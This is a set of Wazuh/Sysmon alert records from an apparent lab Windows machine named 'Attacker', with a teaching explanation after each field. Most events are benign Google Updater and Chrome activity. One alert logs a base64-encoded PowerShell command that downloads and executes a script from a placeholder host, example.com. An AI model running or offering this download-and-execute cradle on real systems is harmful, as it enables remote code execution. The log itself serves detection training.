data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows command prompt started by an abnormal process Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92052 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534204.745458 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:32:59.8330733Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 279936 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:32:59.779
ProcessGuid: {94294ddc-bc1b-680a-0b0a-000000000e00}
ProcessId: 9120
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.26100.3624 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: "C:\WINDOWS\system32\cmd.exe" /Q /C ""C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\uninstall.cmd" --dir="C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0""
CurrentDirectory: C:\WINDOWS\system32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04
ParentProcessGuid: {94294ddc-bc07-680a-f709-000000000e00}
ParentProcessId: 8992
ParentImage: C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe
ParentCommandLine: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe" --system --windows-service --service=update-internal
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:32:59.779 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc1b-680a-0b0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9120 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3624 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows Command Processor No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: Cmd.Exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\system32\\cmd.exe\" /Q /C \"\"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\uninstall.cmd\" --dir=\"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\WINDOWS\\system32\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bc07-680a-f709-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8992 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\updater.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\updater.exe\" --system --windows-service --service=update-internal No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534204.751824 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:13.6930233Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 280095 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:33:12.668
ProcessGuid: {94294ddc-bc28-680a-220a-000000000e00}
ProcessId: 11012
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc25-680a-1d0a-000000000e00}
ParentProcessId: 13852
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:33:12.668 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc28-680a-220a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11012 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bc25-680a-1d0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13852 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534204.759894 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:19.6224934Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 280237 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:33:19.616
ProcessGuid: {94294ddc-bc2b-680a-270a-000000000e00}
ProcessId: 15028
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5klyxkyf.pry.ps1
CreationUtcTime: 2025-04-24 22:33:19.615
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:33:19.616 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc2b-680a-270a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15028 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5klyxkyf.pry.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:33:19.615 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
🔍 Why it's important: Critical or commonly abused ATT&CK technique
rule.description: Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92307 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid13_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534205.762662 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:22.7768023Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 280333 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-24 22:33:22.771
ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00}
ProcessId: 2892
Image: C:\WINDOWS\system32\svchost.exe
TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739}
Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
User: NT AUTHORITY\LOCAL SERVICE" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.eventType: SetValue No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:33:22.771 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-ea86-67fe-3b00-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetObject: HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B9A8F440-6AF8-49E0-98A4-35D48B0E4739} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\LOCAL SERVICE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\"
🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\"
🔍 Why it's important: Critical or commonly abused ATT&CK technique
rule.description: Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\" Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92307 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid13_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534205.766890 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
